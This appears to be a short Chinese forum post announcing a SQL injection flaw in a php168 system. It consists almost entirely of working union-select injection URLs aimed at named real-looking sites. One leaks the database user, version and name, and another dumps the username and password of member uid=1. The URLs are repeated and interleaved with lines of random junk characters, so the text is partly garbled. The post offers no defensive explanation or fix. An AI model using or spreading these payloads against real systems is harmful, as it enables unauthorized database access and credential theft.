php168某系统注入漏洞

admin

http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
                                                         
) U5 k/ u; w$ d$ z& i3 E% X                                       
$ {  w% R* `0 M4 @7 U4 h, f; V7 r
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
( C* e* {# q  @! o: T                                                     
; [+ ?" S3 [- P' n0 a, E' T                                                                  
# j, [7 U' t( ^# j                                                        
" J% e( K: X# L& p. h7 W; G/ vhttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
- W" L3 D# y. O$ [
5 k9 z3 J" ~8 {0 m9 K3 U# q

                                                            
# a# N8 f. K) G/ N/ T
* @$ y* c/ M7 C7 _! G/ v% B+ t5 }8 u0 {http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
2 v$ j; M& X; n! Z% t  k1 G. W
6 g5 Y" M* }, p) v3 g9 _; \

9 f6 w; t3 M4 _                                                                    
0 O. n, ]' k1 U. l0 x  _4 P